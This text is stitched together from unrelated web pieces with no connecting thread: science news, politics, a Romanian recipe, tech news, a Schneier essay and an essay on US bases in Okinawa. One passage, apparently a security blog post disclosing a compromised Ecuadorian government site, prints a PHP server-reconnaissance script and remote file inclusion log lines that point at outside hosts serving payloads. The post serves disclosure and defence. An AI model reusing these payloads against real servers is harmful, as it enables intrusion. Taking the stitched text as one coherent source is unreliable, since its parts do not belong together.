To do this , she created fear memories in 65 test subjects by flashing yellow and blue squares at them , pairing some of the yellow squares with a mild shock to the wrist .
After conditioning , the appearance of a single yellow square was enough to raise her subjects ’ skin conductivity — a fear response typically caused by an increase in sweat production .
She then divided her subjects into three groups :
A third were simply given lab therapy ; they repeatedly viewed yellow and blue squares without shocks until they failed to break a sweat .
The rest had the fearful memory triggered first by the sight of a single yellow square , and then got lab therapy after a lag of either six hours or ten minutes .
Importantly , since reconsolidation takes about ten minutes to kick in after a memory is recalled , and lasts for a couple hours , only the ten - minute group would be in the process of reconsolidating the memory at the start of lab therapy .
This timing , Schiller hypothesized , was everything : the ten - minute group would actually rewrite old memories , while the others would merely create new memories .
The next day , as expected , the memory had returned in some subjects — the yellow square still caused them to sweat — but the fear response did not return in any of the subjects whom she had triggered reconsolidation in ten minutes before therapy .
Just as in Ledoux ’s rats , the memory had vanished .
Poof !
To test how permanent the effect was , one year later , Schiller tracked down about a third of the original test subjects and got them to come back into the lab so she could again flash colored squares in their faces .
The subjects that she had n’t triggered reconsolidation in ten minutes before lab therapy still broke a sweat in the presence of the yellow square — a nice demonstration of just how hard it is to eliminate a fearful memory .
But the subjects that she had triggered reconsolidation in ten minutes before therapy still did n’t break a sweat when they saw the yellow square ; in these subjects , the fear memory had been permanently erased .
Schiller believes that by timing lab therapy so that it was initiated precisely when the memory was being reconsolidated — when the neural connections it was stored in were open to change — therapy did not simply create new memories , but actually rewrote the original memory with one that did n’t include a fear response .
Real life fear memories , which involve multiple senses , are much more complex than memories created by scientists in a laboratory .
But the results of the experiment do make the important suggestion that in order for PTSD therapy to be effective , the traumatic memory may have to be fully remembered first .
This means , of course , that if you want to overwrite a frightful mugging with a day at the beach , you may have to relive every last detail of the mugging — a reality that might make reconsolidation - based PTSD therapy rather , well , traumatic .
President Barack Obama speaks about healthcare reform from the East Room of the White House in Washington March 3 , 2010 .
REUTERS / Kevin Lamarque
WASHINGTON ( Reuters ) - President Barack Obama will outline his administration ’s vision for space agency NASA and an eventual trip to Mars during a conference in Florida in April , the White House said on Sunday .
Obama has had to defend his commitment to the space agency in the politically important U.S. state after submitting a budget to Congress that would cancel a program to return U.S. astronauts to the moon .
Obama wants to refocus NASA efforts on technologies to prepare for human missions to other destinations in the solar system .
His budget would spend $ 6 billion over five years to turn over space transportation to commercial companies as well as billions of dollars on technology development and extending the life of the International Space Station .
“ After years of underinvestment in new technology and unrealistic budgeting , the President ’s plan will unveil an ambitious plan for NASA that sets the agency on a reinvigorated path of space exploration , ” the White House said in a statement .
It said the investment in new technology would “ help us travel from the Earth ’s cradle to our nearby Solar System neighborhood in a more effective and affordable way , thus laying the foundation to support journeys to the Moon , asteroids , and eventually to Mars . ”
The White House - sponsored conference will take place on April 15 .
“ The conference will focus on the goals and strategies in this new vision , the next steps , and the new technologies , new jobs , and new industries it will create , ” it said .
“ Conference topics will include the implications of the new strategy for Florida , the nation , and our ultimate activities in space . ”
Florida is a political “ swing ” state that tends to shift its support between Democrats and Republicans in presidential elections .
In 2008 the state backed Obama , a Democrat , for the presidency over his Republican challenger , Senator John McCain .
on January 1 , 2010
From childhood you have known the Holy Scriptures , which are able to make you wise for salvation through faith which is in Christ Jesus .
( 2 Timothy 3:15 )
I Am Not Ashamed began with a simple conversation and prayerful consideration of what message America needs to hear most right now .
We wanted a message that would offer a clear call to Christians around the world to stand unashamedly and uncompromisingly on the Bible .
Watch the videos below as Answers in Genesis staff read selections from Genesis 1 — 11 .
Zilele astea aveam pofta de ceva dulce dar ma gandeam cu groaza ca trebuie sa deschid cuptorul .
Asa ca m-am uitat prin frigider si am facut repejor bunatatea asta de cheescake , fara sa pun nimic pe foc .
Ingrediente :
Pentru stratul maro :
o cana de nuci
vreo 4 - 5 prune uscate
o mana de stafide
2 - 3 linguri de miere
un pic de esenta de vanilie
ceva coaja de portocale razuita
Pentru stratul alb :
branza de vaci
miere
( in proportia dorita )
Pentru ciocolata :
o bucata de unt topit
2 linguri de cacao
2 linguri miere
Preparare :
Am preparat intai stratul maro : am bagat in blender toate ingredientele pana a rezultat o pasta mai tare pe care am presat - o apoi pe fundul unui bol acoperit cu folie alimentara .
Am bagat la congelator .
Intre timp , am pus branza cu miere in blender si a iesit o pasta mai moale pe care am turnat -o deasupra celei din congelator .
Am lasat in continuare sa se intareasca .
Pentru glazura am topit untul in microunde si l-am amestecat cu restul ingredientelor .
Daca vi se pare prea dulce puteti micsora cantitatea de miere din fiecare strat .
Dupa vreo 30 - 45 min am scos bolul din congelator , l- am rasturnat pe o farfurie si am turnat glazura .
L- am mai tinut la frigider de data asta cam 1 ora pana s-a intarit .
A fost foarte usor de facut , foarte sanatos si foarte foarte bun !
Dubai has announced that their Abu Dhabi December bail out has turned out to be half the size they expected -- $ 5 billion rather than the $ 10 billion previously thought .
Apparently $ 5 billion of the $ 10 billion was comprised of loans to Dubai that Abu Dhabi banks had already organized before the Dubai crisis .
This communication error says a lot about the lack of proper interaction between the two city - states .
WSJ : Dubai , struggling under total debt estimated as high as $ 80 billion , announced in February that the U.A.E. federal government would buy bonds issued by Dubai valued at $ 10 billion .
The proceeds would go to pay down debt and unpaid bills .
Then , in late November , Dubai announced the two Abu Dhabi banks would subscribe to an additional $ 5 billion in bonds .
Hours later , however , Dubai shocked global investors by announcing that its corporate flagship , Dubai World , would request a debt standstill from lenders .
Markets are putting Dubai , and interestingly other nations , back on the sovereign debt crisis hot list :
Investors sold off Dubai - related bonds , suddenly worried that Abu Dhabi was n't willing to step in and rescue its indebted neighbor .
Investors also bid up the price of insuring against other highly indebted governments , from Greece to Russia .
Even cash - rich governments in the region , such as Saudi Arabia and Abu Dhabi , saw the price of insuring against a default of their sovereign debt rise sharply , making it more difficult and expensive to borrow on international markets .
In the sequel to " Happy Feet , " the Penguins will be the same size .
But the data center will be smaller .
The digital production company Dr. D Studios has packed a large amount of supercomputing power into a smaller package in its new rendering facility in Sydney , Australia .
In 2007 , Animal Logic won the Oscar for Best Animated Feature Film of the Year for " Happy Feet " , while the company 's data center was ranked 260th in the Top 500 in 2006 .
Happy Feet producer George Miller has since founded Dr. D Studios , which has taken the lead on animation for the sequel and is preparing a new supercomputer grid cluster for rendering " Happy Feet 2 " as well as visual effects for " Fury Road , " a fourth film in the Mad Max series .
The first 1,000 cores of the new system are online and placed in an APC hot aisle containment pod .
From 150 Chassis to 24
Sydney - based Dr. D Studios is enjoying the advances in compute density as they fit everything into just 24 chassis , instead of the 250 that it took for the original Happy Feet .
James Bourne , infrastructure engineering manager for Dr. D sums it up nice by saying that " back [ in 2005 ] , we were working with single - core [ Intel ] Xeons ; as hyperthreading was of little benefit .
Each blade had two cores then - now they have eight - and 16 per node should hyper - threading be turned on .
Memory density has increased as well now from 1.5 GB per node to 24GB . "
The original data center Animal Logic used to render Happy Feet was an Equinix facility in Sydney .
Now that 30 kW of power per cabinet is needed for the sequel , Dr. D Studios turned to APC pods to provide water cooled housing in an E3 Networks data center .
This allows provisioning of 6,000 cores in a space of no more than 10 x 5 meters ( 32 x 16 feet ) .
HP blade servers will be used for the 6,000 cores .
The space and power available to Dr. D in the E3 facility will allow it to scale the cluster to 12,000 cores if necessary .
Peak rendering , in mid-2011 is expected to surpass 6,000 cores and hopefully land a second Australia supercomputer on the Top500 list .
Several Expansions for Pegasus Site
The E3 Networks Pegasus data center in Sydney has had several expansions and has a 110 square meter ( 1,184 square foot ) suite for Dr. D Studios .
The E3 data center is close to Global Switch , Equinix and a Dr. D facility in Carriageworks , Redfern and will be connected by Internet Service Provider Cincenet .
Australia 's iTnews recently covered the facility specifications as well as a video tour , which is embedded below :
0 SHARES Facebook Twitter
Colombia , Venezuela and now Ecuador .
How far are we from reporting the whole South America ? 🙂
The web site from the ‘ Municipio del Cantón Mejía ’ in Ecuador has been hosting malware and also attacking our honeypots for a while .
As always , we reported and did n’t hear anything back .
They are hosting the common FX29ID php exploit :
http://www.municipiodemejia.gov.ec/administrator/components/com_search/sken/id1(feelcomz).txt
< ? php
# #[ Fxxxx ]##
fx (“ ID ” , ” FeeL ” . ” CoMz ” ) ;
$ P = @getcwd ( ) ;
$ IP = @getenv( “ SERVER_ADDR ” ) ;
$ UID = fx29exec ( “ id ” ) ;
fx (“ SAFE ” , @safemode ( ) ? ” ON ” : ” OFF ” ) ;
fx (“ OS ” , @PHP_OS ) ;
fx (“ UNAME ” , @php_uname ( ) ) ;
fx (“ SERVER ” , ( $ IP ) ? $ IP : ” - “ ) ;
fx (“ USER ” ,@get_current_user ( ) ) ;
fx (“ UID ” , ( $ UID ) ?$ UID :” uid=”.@getmyuid ( ) . ” gid=”.@getmygid ( ) ) ;
fx (“ DIR ” , $P ) ;
fx (“ PERM ” , ( @is_writable ( $ P ) ) ? ” [ W ] ” : ” [ R ] ” ) ;
fx (“ HDD ” , ” Used : “ .hdd ( “ used ” ) . ”
Free : “ .hdd ( “ free ” ) . ” Total : “ .hdd ( “ total ” ) ) ;
fx (“ DISFUNC ” , @getdisfunc ( ) ) ;
##[ FX29SHEXEC ]##
Also attempting RFI attacks against our systems ( 190.152.217.250 is their IP address ) :
SCAN:190.152.217.250 /xxx/new-visitor.inc.php?lvc_include_dir=http://www.j8design.com/id1.txt?
190.152.217.250 /xxx/show.php?path=
http://kucing1.fileave.com/id1.txt?
190.152.217.250 //?_SERVER[DOCUMENT_ROOT ] =
http://clompunk.webs.com/id1.txt?
190.152.217.250 //bbs///skin/buzzard_espoon/setup.php?dir=
http://www.hyonsvc.co.kr//bbs//icon/id1.txt????????
190.152.217.250 //delete_comment.php?board_skin_path=
http://www.hyonsvc.co.kr//bbs//icon/id1.txt
If you know anyone at the Ecuador .gov , let them know about it .
Hopefully they will get it fixed soon .
Sometimes mediocre encryption is better than strong encryption , and sometimes no encryption is better still .
The Wall Street Journal reported this week that Iraqi , and possibly also Afghan , militants are using commercial software to eavesdrop on U.S. Predators , other unmanned aerial vehicles , or UAVs , and even piloted planes .
The systems were n't " hacked " – the insurgents can’t control them – but because the downlink is unencrypted , they can watch the same video stream as the coalition troops on the ground .
The naive reaction is to ridicule the military .
Encryption is so easy that HDTVs do it – just a software routine and you 're done – and the Pentagon has known about this flaw since Bosnia in the 1990s .
But encrypting the data is the easiest part ; key management is the hard part .
Each UAV needs to share a key with the ground station .
These keys have to be produced , guarded , transported , used and then destroyed .
And the equipment , both the Predators and the ground terminals , needs to be classified and controlled , and all the users need security clearance .
The command and control channel is , and always has been , encrypted – because that 's both more important and easier to manage .
UAVs are flown by airmen sitting at comfortable desks on U.S. military bases , where key management is simpler .
But the video feed is different .
It needs to be available to all sorts of people , of varying nationalities and security clearances , on a variety of field terminals , in a variety of geographical areas , in all sorts of conditions – with everything constantly changing .
Key management in this environment would be a nightmare .
Additionally , how valuable is this video downlink is to the enemy ?
The primary fear seems to be that the militants watch the video , notice their compound being surveilled and flee before the missiles hit .
Or notice a bunch of Marines walking through a recognizable area and attack them .
This might make a great movie scene , but it 's not very realistic .
Without context , and just by peeking at random video streams , the risk caused by eavesdropping is low .
Contrast this with the additional risks if you encrypt :
A soldier in the field does n't have access to the real - time video because of a key management failure ; a UAV can't be quickly deployed to a new area because the keys are n't in place ; we can't share the video information with our allies because we can't give them the keys ; most soldiers can't use this technology because they do n't have the right clearances .
Given this risk analysis , not encrypting the video is almost certainly the right decision .
There is another option , though .
During the Cold War , the NSA 's primary adversary was Soviet intelligence , and it developed its crypto solutions accordingly .
Even though that level of security makes no sense in Bosnia , and certainly not in Iraq and Afghanistan , it is what the NSA had to offer .
If you encrypt , they said , you have to do it " right . "
The problem is , the world has changed .
Today 's insurgent adversaries do n't have KGB - level intelligence gathering or cryptanalytic capabilities .
At the same time , computer and network data gathering has become much cheaper and easier , so they have technical capabilities the Soviets could only dream of .
Defending against these sorts of adversaries does n't require military - grade encryption only where it counts ; it requires commercial - grade encryption everywhere possible .
This sort of solution would require the NSA to develop a whole new level of lightweight commercial - grade security systems for military applications — not just office - data " Sensitive but Unclassified " or " For Official Use Only " classifications .
It would require the NSA to allow keys to be handed to uncleared UAV operators , and perhaps read over insecure phone lines and stored in people 's back pockets .
It would require the sort of ad hoc key management systems you find in internet protocols , or in DRM systems .
It would n't be anywhere near perfect , but it would be more commensurate with the actual threats .
And it would help defend against a completely different threat facing the Pentagon : The PR threat .
Regardless of whether the people responsible made the right security decision when they rushed the Predator into production , or when they convinced themselves that local adversaries would n't know how to exploit it , or when they forgot to update their Bosnia - era threat analysis to account for advances in technology , the story is now being played out in the press .
The Pentagon is getting beaten up because it's not protecting against the threat — because it 's easy to make a sound bite where the threat sounds really dire .
And now it has to defend against the perceived threat to the troops , regardless of whether the defense actually protects the troops or not .
Reminds me of the TSA , actually .
So the military is now committed to encrypting the video ... eventually .
The next generation Predators , called Reapers – Who names this stuff ?
Second - grade boys ?
– will have the same weakness .
Maybe we ’ll have encrypted video by 2010 , or 2014 , but I do n't think that 's even remotely possible unless the NSA relaxes its key management and classification requirements and embraces a lightweight , less secure encryption solution for these sorts of situations .
The real failure here is the failure of the Cold War security model to deal with today 's threats .
\—
Bruce Schneier is chief security technology officer of BT .
His new book is Schneier on Security .
Ending weeks of speculation about its future , Palm has been acquired by Hewlett - Packard for $ 1.2 billion , the companies announced this afternoon .
The survival of webOS and its parent company had come under question in recent weeks , with some analysts suggesting that shares of Palm were essentially worthless .
Things only got worse when RadioShack decided to stop selling Palm 's two flagship devices : Pre and Pixi .
Now it appears that Palm and its mobile operating system have lived to fight another day , with CEO Jon Rubinstein saying in a statement that " HP ’s longstanding culture of innovation , scale and global operating resources make it the perfect partner to rapidly accelerate the growth of webOS . "
The move puts HP squarely back in the smartphone game ( they currently sell the Windows Mobile - powered iPAQ ) — a space pioneered in many ways by Palm during the 1990s but since taken over by the likes of Apple , Microsoft , Google , and Research in Motion .
Even HP 's biggest rival in the PC space — Dell — is gearing up to launch an Android - powered smartphone later this year .
With only 6 % or so of the smartphone market at last count , the company still faces an enormously uphill battle in trying to once again become a major player in mobile .
Nonetheless ,
Palm users and developers can breathe a collective sigh of relief as the threat of a sudden death to the smartphone maker has been taken off the table .
For the first time , researchers have shown that erectile dysfunction is a strong predictor of the likelihood that men will die of heart disease .
Men who suffer from the problem , which some consider more an emotional than a physical issue , are twice as likely to succumb to cardiovascular disease or heart attacks as those who do not have the problem , German researchers reported Monday in Circulation : Journal of the American Heart Assn .
Researchers have known for years that there is a link between erectile dysfunction , commonly abbreviated as ED , and heart disease , said Dr. Sahil Parikh , an interventional cardiologist from University Hospitals Case Medical Center in Cleveland who was not involved in the study .
“ But now there is pretty clear evidence that there is a substantially increased risk of heart attack and death when patients have erectile dysfunction . ”
The results are probably not too surprising , added Dr. Robert Kloner , a cardiologist at USC ’s Keck School of Medicine , “ because arteries in the penis are smaller , so atherosclerosis shows up there sooner , ” perhaps three to four years before the onset of cardiovascular disease .
The take - home message , both experts said , is that when a patient seeks treatment for ED , typically from a general practitioner , he should be given a full physical work - up to look for heart disease and referred to a cardiologist .
“ When they are treated aggressively early , we can prevent heart attacks and stroke and they can have many years added to their lives , ” Parikh said .
Existing guidelines for treating men with ED from the Princeton Consensus Conference already state that “ a man with ED and no cardiac symptoms is a cardiac ( or vascular ) patient until proven otherwise . ”
Kloner , a coauthor of those guidelines , said that when the guidelines are updated this year , they will probably carry a stronger recommendation that a patient presenting with ED get a cardiovascular examination .
Dr. Michael Bohm , a cardiologist at Germany ’s Saarland University , and his colleagues studied 1,519 men from 13 countries who were involved in a study of two drugs to treat cardiovascular disease .
The men were also queried about their ED at the beginning of the study , two years into it and at the end at five years .
A full 55 % of the men had ED at the beginning of the trial , nearly double the normal incidence of about 30 % in the population at large .
The team reported that , in the five years of follow - up , men with ED were 1.9 times as likely to die from heart disease , twice as likely to have a heart attack , 1.2 times as likely to be hospitalized for heart failure and 1.1 times more likely to have a stroke .
The risks increased with the severity of the ED .
Disappointingly , the two drugs tested in the study , ramipril and telmisartan , did not improve the course of the ED .
That ’s not surprising , said Dr. Peter Pelikan , a cardiologist at Saint John ’s Health Center in Santa Monica , “ because it takes years and years and years to get any resorption of cholesterol ” that would reduce blockage of the penile arteries .
“ The study was too small and too short to see that . ”
Many men with ED see a general practitioner or a urologist to get treatment and are prescribed drugs like Viagra or Cialis , Bohm said in a statement .
“ The drug works and the patient does n’t show up any more .
These men are being treated for ED , but not the underlying cardiovascular disease .
A whole segment of men is being placed at risk . ”
thomas .
maugh@
latimes.com
Horse milk is being billed as a gourmet food that is a healthier alternative than dog or cat milk .
Descriptions of the taste range from ' fruity ' to ' hazelnut - like ' and it is sold and used more commonly in Europe than in the United States
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
This story first appeared on the TomDispatch website .
For a country with a pacifist constitution , Japan is bristling with weaponry .
Indeed , that Asian land has long functioned as a huge aircraft carrier and naval base for US military power .
We could n’t have fought the Korean and Vietnam Wars without the nearly 90 military bases scattered around the islands of our major Pacific ally .
Even today , Japan remains the anchor of what ’s left of America ’s Cold War containment policy when it comes to China and North Korea .
From the Yokota and Kadena air bases , the United States can dispatch troops and bombers across Asia , while the Yokosuka base near Tokyo is the largest American naval installation outside the United States .
You ’d think that , with so many Japanese bases , the United States would n’t make a big fuss about closing one of them .
Think again .
The current battle over the Marine Corps air base at Futenma on Okinawa — an island prefecture almost 1,000 miles south of Tokyo that hosts about three dozen US bases and 75 % of American forces in Japan — is just revving up .
In fact , Washington seems ready to stake its reputation and its relationship with a new Japanese government on the fate of that base alone , which reveals much about US anxieties in the age of Obama .
What makes this so strange , on the surface , is that Futenma is an obsolete base .
Under an agreement the Bush administration reached with the previous Japanese government , the US was already planning to move most of the Marines now at Futenma to the island of Guam .
Nonetheless , the Obama administration is insisting , over the protests of Okinawans and the objections of Tokyo , on completing that agreement by building a new partial replacement base in a less heavily populated part of Okinawa .
The current row between Tokyo and Washington is no mere “ Pacific squall , ” as Newsweek dismissively described it .
After six decades of saying yes to everything the United States has demanded , Japan finally seems on the verge of saying no to something that matters greatly to Washington , and the relationship that Dwight D. Eisenhower once called an “ indestructible alliance ” is displaying ever more hairline fractures .
Worse yet , from the Pentagon ’s perspective , Japan ’s resistance might prove infectious — one major reason why the United States is putting its alliance on the line over the closing of a single antiquated military base and the building of another of dubious strategic value .
During the Cold War , the Pentagon worried that countries would fall like dominoes before a relentless Communist advance .
Today , the Pentagon worries about a different kind of domino effect .
In Europe , NATO countries are refusing to throw their full support behind the US war in Afghanistan .
In Africa , no country has stepped forward to host the headquarters of the Pentagon ’s new Africa Command .
In Latin America , little Ecuador has kicked the US out of its air base in Manta .
All of these are undoubtedly symptoms of the decline in respect for American power that the US military is experiencing globally .
But the current pushback in Japan is the surest sign yet that the American empire of overseas military bases has reached its high - water mark and will soon recede .
Toady No More ?
Until recently , Japan was virtually a one - party state , and that suited Washington just fine .
The long - ruling Liberal Democratic Party ( LDP ) had the coziest of bipartisan relations with that city ’s policymakers and its “ chrysanthemum club ” of Japan - friendly pundits .
A recent revelation that , in 1969 , Japan buckled to President Richard Nixon ’s demand that it secretly host US ships carrying nuclear weapons — despite Tokyo ’s supposedly firm anti-nuclear principles — has pulled back the curtain on only the tip of the toadyism .
During and after the Cold War , Japanese governments bent over backwards to give Washington whatever it wanted .
When government restrictions on military exports got in the way of the alliance , Tokyo simply made an exception for the United States .
When cooperation on missile defense contradicted Japan ’s ban on militarizing space , Tokyo again waved a magic wand and made the restriction disappear .
Although Japan ’s constitution renounces the “ threat or the use of force as a means of settling international disputes , ” Washington pushed Tokyo to offset the costs of the US military adventure in the first Gulf War against Saddam Hussein in 1990 - 1991 , and Tokyo did so .
Then , from November 2001 until just recently , Washington persuaded the Japanese to provide refueling in the Indian Ocean for vessels and aircraft involved in the war in Afghanistan .
In 2007 , the Pentagon even tried to arm - twist Tokyo into raising its defense spending to pay for more of the costs of the alliance .
Of course , the LDP complied with such demands because they intersected so nicely with its own plans to bend that country ’s peace constitution and beef up its military .
Over the last two decades , in fact , Japan has acquired remarkably sophisticated hardware , including fighter jets , in - air refueling capability , and assault ships that can function like aircraft carriers .
It also amended the 1954 Self - Defense Forces Law , which defines what the Japanese military can and cannot do , more than 50 times to give its forces the capacity to act with striking offensive strength .
Despite its “ peace constitution , ” Japan now has one of the top militaries in the world .
Enter the Democratic Party of Japan ( DPJ ) .
In August 2009 , that upstart political party dethroned the LDP , after more than a half - century in power , and swept into office with a broad mandate to shake things up .
Given the country ’s nose - diving economy , the party ’s focus has been on domestic issues and cost-cutting .
Not surprisingly , however , the quest to cut pork from the Japanese budget has led the party to scrutinize the alliance with the US Unlike most other countries that host US military bases , Japan shoulders most of the cost of maintaining them : more than $ 4 billion per year in direct or indirect support .
Under the circumstances , the new government of Prime Minister Yukio Hatoyama proposed something modest indeed — putting the US - Japan alliance on , in the phrase of the moment , a “ more equal ” footing .
It inaugurated this new approach in a largely symbolic way by ending Japan ’s resupply mission in the Indian Ocean ( though Tokyo typically sweetened the pill by offering a five - year package of $ 5 billion in development assistance to the Afghan government ) .
More substantively , the Hatoyama government also signaled that it wanted to reduce its base - support payments .
Japan ’s proposed belt - tightening comes at an inopportune moment for the Obama administration , as it tries to pay for two wars , its “ overseas contingency operations , ” and a worldwide network of more than 700 military bases .
The burdens of US overseas operations are increasing , and fewer countries are proving willing to share the costs .
Of Dugongs and Democracy
The immediate source of tension in the US - Japanese relationship has been Tokyo ’s desire to renegotiate that 2006 agreement to close Futenma , transfer those 8,000 Marines to Guam , and build a new base in Nago , a less densely populated area of the island .
It ’s a deal that threatens to make an already strapped government pay big .
Back in 2006 , Tokyo promised to shell out more than $ 6 billion just to help relocate the Marines to Guam .
The political cost to the new government of going along with the LDP ’s folly may be even higher .
After all , the DPJ received a healthy chunk of voter support from Okinawans , dissatisfied with the 2006 agreement and eager to see the American occupation of their island end .
Over the last several decades , with US bases built cheek - by - jowl in the most heavily populated parts of the island , Okinawans have endured air , water , and noise pollution , accidents like a 2004 US helicopter crash at Okinawa International University , and crimes that range from trivial speeding violations all the way up to the rape of a 12 - year - old girl by three Marines in 1995 .
According to a June 2009 opinion poll , 68 % of Okinawans opposed relocating Futenma within the prefecture , while only 18 % favored the plan .
Meanwhile , the Social Democratic Party , a junior member of the ruling coalition , has threatened to pull out if Hatoyama backs away from his campaign pledge not to build a new base in Okinawa .
Then there ’s the dugong , a sea mammal similar to the manatee that looks like a cross between a walrus and a dolphin and was the likely inspiration for the mermaid myth .
Only 50 specimens of this endangered species are still living in the marine waters threatened by the proposed new base near less populated Nago .
In a landmark case , Japanese lawyers and American environmentalists filed suit in US federal court to block the base ’s construction and save the dugong .
Realistically speaking , even if the Pentagon were willing to appeal the case all the way up to the Supreme Court , lawyers and environmentalists could wrap the US military in so much legal and bureaucratic red tape for so long that the new base might never leave the drawing board .
For environmental , political , and economic reasons , ditching the 2006 agreement is a no-brainer for Tokyo .
Given Washington ’s insistence on retaining a base of little strategic importance , however , the challenge for the DPJ has been to find a site other than Nago .
The Japanese government floated the idea of merging the Futenma facility with existing facilities at Kadena , another US base on the island .
But that plan — as well as possible relocation to other parts of Japan — has met with stiff local resistance .
A proposal to further expand facilities in Guam was nixed by the governor there .
The solution to all this is obvious : close down Futenma without opening another base .
But so far , the United States is refusing to make it easy for the Japanese .
In fact , Washington is doing all it can to box the new government in Tokyo into a corner .
Ratcheting Up the Pressure
The US military presence in Okinawa is a residue of the Cold War and a US commitment to containing the only military power on the horizon that could threaten American military supremacy .
Back in the 1990s , the Clinton administration ’s solution to a rising China was to “ integrate , but hedge . ”
The hedge — against the possibility of China developing a serious mean streak — centered around a strengthened US - Japan alliance and a credible Japanese military deterrent .
What the Clinton administration and its successors did n’t anticipate was how effectively and peacefully China would disarm this hedging strategy with careful statesmanship and a vigorous trade policy .
A number of Southeast Asian countries , including the Philippines and Indonesia , succumbed early to China ’s version of checkbook diplomacy .
Then , in the last decade , South Korea , like the Japanese today , started to talk about establishing “ more equal ” relations with the United States in an effort to avoid being drawn into any future military scrape between Washington and Beijing .
Now , with its arch - conservatives gone from government , Japan is visibly warming to China ’s charms .
In 2007 , China had already surpassed the United States as the country ’s leading trade partner .
On becoming prime minister , Hatoyama sensibly proposed the future establishment of an East Asian community patterned on the European Union .
As he saw it , that would leverage Japan ’s position between a rising China and a United States in decline .
In December , while Washington and Tokyo were haggling bitterly over the Okinawa base issue , DPJ leader Ichiro Ozawa sent a signal to Washington as well as Beijing by shepherding a 143 - member delegation of his party ’s legislators on a four - day trip to China .
Not surprisingly , China ’s bedazzlement policy has set off warning bells in Washington , where the People ’s Republic is still a focus of primary concern for a cadre of strategic planners inside the Pentagon .
The Futenma base — and its potential replacement — would be well situated , should Washington ever decide to send rapid response units to the Taiwan Strait , the South China Sea , or the Korean peninsula .
Strategic planners in Washington like to speak of the “ tyranny of distance , ” of the difficulty of getting “ boots on the ground ” from Guam or Hawaii in case of an East Asian emergency .
Yet the actual strategic value of Futenma is , at best , questionable .
The South Koreans are more than capable of dealing with any contingency on the peninsula .
And the United States frankly has plenty of firepower by air ( Kadena ) and sea ( Yokosuka ) within hailing distance of China .
A couple thousand Marines wo n’t make much of a difference ( though the leathernecks strenuously disagree ) .
However , in a political environment in which the Pentagon is finding itself making tough choices between funding counterinsurgency wars and old Cold War weapons systems , the “ China threat ” lobby does n’t want to give an inch .
Failure to relocate the Futenma base within Okinawa might be the first step down a slippery slope that could potentially put at risk billions of dollars in Cold War weapons still in the production line .
It ’s hard to justify buying all the fancy toys without a place to play with them .
And that ’s one reason the Obama administration has gone to the mat to pressure Tokyo to adhere to the 2006 agreement .
It even dispatched Secretary of Defense Robert Gates to the Japanese capital last October in advance of President Obama ’s own Asian tour .
Like an impatient father admonishing an obstreperous teenager , Gates lectured the Japanese “ to move on ” and abide by the agreement — to the irritation of both the new government and the public .
The punditocracy has predictably closed ranks behind a bipartisan Washington consensus that the new Japanese government should become as accustomed to its junior status as its predecessor and stop making a fuss .
The Obama administration is frustrated with “ Hatoyama ’s amateurish handling of the issue , ” writes Washington Post editorial page editor Fred Hiatt .
“ What has resulted from Mr. Hatoyama ’s failure to enunciate a clear strategy or action plan is the biggest political vacuum in over 50 years , ” adds Victor Cha , former director of Asian affairs at the National Security Council .
Neither analyst acknowledges that Tokyo ’s only “ failure ” or “ amateurish ” move was to stand up to Washington .
“ The dispute could undermine security in East Asia on the 50th anniversary of an alliance that has served the region well , ” intoned The Economist more bluntly .
“ Tough as it is for Japan ’s new government , it needs to do most , though not all , of the caving in . ”
The Hatoyama government is by no means radical , nor is it anti-American .
It is n’t preparing to demand that all , or even many , US bases close .
It is n’t even preparing to close any of the other three dozen ( or so ) bases on Okinawa .
Its modest pushback is confined to Futenma , where it finds itself between the rock of Japanese public opinion and the hard place of Pentagon pressure .
Those who prefer to achieve Washington ’s objectives with Japan in a more roundabout fashion counsel patience .
“ If America undercuts the new Japanese government and creates resentment among the Japanese public , then a victory on Futenma could prove Pyrrhic , ” writes Joseph Nye , the architect of US Asia policy during the Clinton years .
Japan hands are urging the United States to wait until the summer , when the DPJ has a shot at picking up enough additional seats in the next parliamentary elections to jettison its coalition partners , if it deems such a move necessary .
Even if the Social Democratic Party is no longer in the government constantly raising the Okinawa base issue , the DPJ still must deal with democracy on the ground .
The Okinawans are dead set against a new base .
The residents of Nago , where that base would be built , just elected a mayor who campaigned on a no - base platform .
It wo n’t look good for the party that has finally brought real democracy to Tokyo to squelch it in Okinawa .
Reverse Island Hop
Wherever the US military puts down its foot overseas , movements have sprung up to protest the military , social , and environmental consequences of its military bases .
This anti-base movement has notched some successes , such as the shut - down of a US navy facility in Vieques , Puerto Rico , in 2003 .
In the Pacific , too , the movement has made its mark .
On the heels of the eruption of Mt. Pinatubo , democracy activists in the Philippines successfully closed down the ash - covered Clark Air Force Base and Subic Bay Naval Station in 1991 - 1992 .
Later , South Korean activists managed to win closure of the huge Yongsan facility in downtown Seoul .
Of course , these were only partial victories .
Washington subsequently negotiated a Visiting Forces Agreement with the Philippines , whereby the US military has redeployed troops and equipment to the island , and replaced Korea ’s Yongsan base with a new one in nearby Pyeongtaek .
But these not - in - my - backyard ( NIMBY ) victories were significant enough to help edge the Pentagon toward the adoption of a military doctrine that emphasizes mobility over position .
The US military now relies on “ strategic flexibility ” and “ rapid response ” both to counter unexpected threats and to deal with allied fickleness .
The Hatoyama government may indeed learn to say no to Washington over the Okinawa bases .
Evidently considering this a likelihood , former deputy secretary of state and former US ambassador to Japan Richard Armitage has said that the United States “ had better have a plan B . ”
But the victory for the anti-base movement will still be only partial .
US forces will remain in Japan , and especially Okinawa , and Tokyo will undoubtedly continue to pay for their maintenance .
Buoyed by even this partial victory , however , NIMBY movements are likely to grow in Japan and across the region , focusing on other Okinawa bases , bases on the Japanese mainland , and elsewhere in the Pacific , including Guam .
Indeed , protests are already building in Guam against the projected expansion of Andersen Air Force Base and Naval Base Guam to accommodate those Marines from Okinawa .
And this strikes terror in the hearts of Pentagon planners .
In World War II , the United States employed an island - hopping strategy to move ever closer to the Japanese mainland .
Okinawa was the last island and last major battle of that campaign , and more people died during the fighting there than in the subsequent atomic bombings of Hiroshima and Nagasaki combined : 12,000 US troops , more than 100,000 Japanese soldiers , and perhaps 100,000 Okinawan civilians .
This historical experience has stiffened the pacifist resolve of Okinawans .
The current battle over Okinawa again pits the United States against Japan , again with the Okinawans as victims .
But there is a good chance that the Okinawans , like the Na’vi in that great NIMBY film Avatar , will win this time .
A victory in closing Futenma and preventing the construction of a new base might be the first step in a potential reverse island hop .
NIMBY movements may someday finally push the US military out of Japan and off Okinawa .
It ’s not likely to be a smooth process , nor is it likely to happen any time soon .
But the kanji is on the wall .
Even if the Yankees do n’t know what the Japanese characters mean , they can at least tell in which direction the exit arrow is pointing .
